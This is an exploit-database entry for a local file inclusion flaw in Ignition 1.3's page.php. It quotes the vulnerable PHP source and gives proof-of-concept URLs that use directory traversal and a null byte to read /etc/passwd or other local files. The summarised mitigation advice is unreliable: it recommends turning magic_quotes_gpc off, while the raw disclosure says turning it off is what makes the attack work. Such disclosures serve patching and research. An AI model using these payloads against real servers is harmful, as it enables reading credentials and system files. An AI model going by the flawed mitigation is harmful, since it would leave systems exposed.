header-logo
Suggest Exploit
vendor:
Ignition
by:
cOndemned
7,5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: Ignition
Affected Version From: 1.2
Affected Version To: 1.3
Patch Exists: NO
Related CWE: N/A
CPE: ignition:1.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009

Ignition 1.3 (page) Local File Inclusion Vulnerability

Ignition 1.3 is vulnerable to Local File Inclusion (LFI) vulnerability. This vulnerability can be exploited by an attacker to include local files on the server. The attacker can send a specially crafted HTTP request containing directory traversal characters (e.g. '../') to the vulnerable page.php script in order to include local files from the web server. The vulnerability is due to insufficient sanitization of user-supplied input passed via the 'page' parameter. An attacker can exploit this vulnerability to include local files from the web server and execute arbitrary code on the vulnerable system.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user-supplied input is properly sanitized and validated. The application should also be configured to use the latest version of PHP and the 'magic_quotes_gpc' should be turned off.
Source

Exploit-DB raw data:

Ignition 1.3 (page) Local File Inclusion Vulnerability
disclosed by cOndemned

download: 

	http://launchpad.net/ignition/trunk/1.3/+download/ignition-1.3.tar.gz

note: 
	1. Magic_quotes_gpc should be turned off in order to exploit this vulnerability
	2. LFI bugs found by me in previous version (1.2) are still working in this one


source of page.php

	1.	<?php
	2.	session_start();
	3.	require "data/settings.php";
	4.	if (file_exists('data/pages/'.$_GET['page'].'.html')) {
	5.	include ('data/pages/'.$_GET['page'].'.html');			<----- LFI
	6.	}else{
	7.	die(
	8.	require('404.php')); }


proof of concept:

	http://[attacked_box]/[ignition1.3]/page.php?page=../../../../../etc/passwd%00
	http://[attacked_box]/[ignition1.3]/page.php?page=../../../../../[localfile]%00